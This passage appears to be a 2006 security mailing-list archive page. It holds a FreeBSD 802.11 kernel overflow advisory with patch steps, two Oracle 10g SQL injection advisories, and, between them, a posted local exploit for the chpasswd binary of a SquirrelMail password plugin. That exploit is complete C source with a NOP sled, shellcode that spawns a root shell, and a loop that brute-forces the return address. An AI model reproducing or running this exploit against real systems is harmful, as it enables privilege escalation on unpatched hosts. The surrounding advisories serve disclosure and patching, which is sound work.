including descriptions of the fields above, security branches, and the
following sections, please visit
<URL:http://www.freebsd.org/security/>.

I.   Background

The IEEE 802.11 network subsystem of FreeBSD implements the protocol
negotiation used for wireless networking.

II.  Problem Description

An integer overflow in the handling of corrupt IEEE 802.11 beacon or
probe response frames when scanning for existing wireless networks can
result in the frame overflowing a buffer.

III. Impact

An attacker able to broadcast a carefully crafted beacon or probe response
frame may be able to execute arbitrary code within the context of the
FreeBSD kernel on any system scanning for wireless networks.

IV.  Workaround

No workaround is available, but systems without IEEE 802.11 hardware or
drivers loaded are not vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 6-STABLE or to the RELENG_6_0
security branch dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 6.0 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:05/80211.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:05/80211.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:http://www.freebsd.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch                                                           Revision
  Path
-------------------------------------------------------------------------
RELENG_6
  src/sys/net80211/ieee80211_ioctl.c                               1.25.2.9
RELENG_6_0
  src/UPDATING                                                1.416.2.3.2.8
  src/sys/conf/newvers.sh                                      1.69.2.8.2.4
  src/sys/net80211/ieee80211_ioctl.c                           1.25.2.3.2.1
-------------------------------------------------------------------------

VII. References

http://www.signedness.org/advisories/sps-0x1.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0226

The latest revision of this advisory is available at
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:05.80211.asc


Change passwd 3.1 (SquirrelMail plugin )

2006-01-19 Thread rod hedor


Change passwd  3.1 (SquirrelMail plugin )

Coded by rod hedor

web-- http://lezr.com

[local exploit]

 * Multiple buffer overflows are present in the handling of command line
 arguments in chpasswd. The bug allows a hacker to exploit the process to
 run arbitrary code.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* payload bytes exactly as posted: a NOP sled followed by the shellcode */
const char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90"
                       "\x90\x90\x90\x90\x90\x90\x90\x90"
                       "\x90\x90\x90\x90\x90\x90\x90\x90"
                       "\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
                       "\x89\xe5\x31\xc0\x50\x55\x89\xe5"
                       "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
                       "\x2f\x62\x69\x89\xe3\x89\xe9\x89"
                       "\xea\xb0\x0b\xcd\x80";

/* i386 only: the value left in %eax is taken as the return value */
long get_sp(){
    __asm__("movl %esp,%eax;");
}

int main(){
    char buffer[1024];
    long stack = get_sp();
    int result = 1;
    long offset = 0;
    printf("[!] Change_passwd v3.1(SquirrelMail plugin) exploit\n");
    printf("[+] Current stack [0x%lx]\n",stack);
    /* retry with an increasing offset until chpasswd exits with status 0 */
    while(offset <= 268435456){
        offset = offset + 1;
        stack = get_sp() + offset;
        memcpy(buffer,"EGG=",4);
        int a = 4;
        while(a <= 108){
            memcpy(&buffer[a],"x",1);
            a = a + 1;}
        memcpy(&buffer[108],&stack,4);
        memcpy(&buffer[112],shellcode,sizeof(shellcode));
        putenv(buffer);
        result = system("./chpasswd $EGG");
        if(result == 0){exit(0);};
    };
};





Oracle Database 10g Rel. 1 - SQL Injection in SYS.KUPV$FT

2006-01-19 Thread ak

#

http://www.red-database-security.com/advisory/oracle_sql_injection_kupv$ft.html

###
SQL Injection in package SYS.KUPV$FT

Name        SQL Injection in package SYS.KUPV$FT
Affected    Oracle 10g Release 1
Severity    High Risk
Category    SQL Injection
Vendor URL  http://www.oracle.com/
Author      Alexander Kornbrust (ak at red-database-security.com)
Advisory    17 Jan 2006 (V 1.00)


Details:

The package SYS.KUPV$FT contains 3 SQL injection vulnerabilities in the 
functions ATTACH_JOB, OPEN_JOB, HAS_PRIVS. Oracle fixed these vulnerabilities 
with the package dbms_assert.




Patch Information:
##
Apply the patches for Oracle CPU Jan 2006 on top of Oracle 10g Release 1.


History:

01-nov-2005 Oracle secalert was informed
02-nov-2005 Oracle secalert asked for an exploit
17-jan-2006 Oracle published CPU January 2006
17-jan-2006 Advisory published



© 2006 by Red-Database-Security GmbH
http://www.red-database-security.com/advisory/published_alerts.html


Oracle Database 10g Rel. 1 - SQL Injection in SYS.KUPV$FT_INT

2006-01-19 Thread ak

#

http://www.red-database-security.com/advisory/oracle_sql_injection_kupv$ft_int.html

###
Name        SQL Injection in package SYS.KUPV$FT_INT
Affected    Oracle 10g Release 1
Severity    High Risk
Category    SQL Injection
Vendor URL  http://www.oracle.com/
Author      Alexander Kornbrust (ak at red-database-security.com)
Advisory    17 Jan 2006 (V 1.00)

Details:

The package SYS.KUPV$FT_INT contains 16 SQL injection vulnerabilities in the 
functions ATTACH_JOB, OPEN_JOB, HAS_PRIVS. Oracle is now using bind variables 
to fix these vulnerabilities. 



Patch Information:
##
Apply the patches for Oracle CPU Jan 2006 on top of Oracle 10g Release 1.


History:

01-nov-2005 Oracle secalert was informed about vulnerabilities in
ACTIVE_JOB, ATTACH_JOB, ATTACH_POSSIBLE, CREATE_NEW_JOB, DELETE_JOB, UPDATE_JOB 
02-nov-2005 Oracle secalert asked for an exploit
17-jan-2006 Oracle published CPU January 2006
17-jan-2006 Advisory published



© 2006 by Red-Database-Security GmbH
http://www.red-database-security.com/advisory/published_alerts.html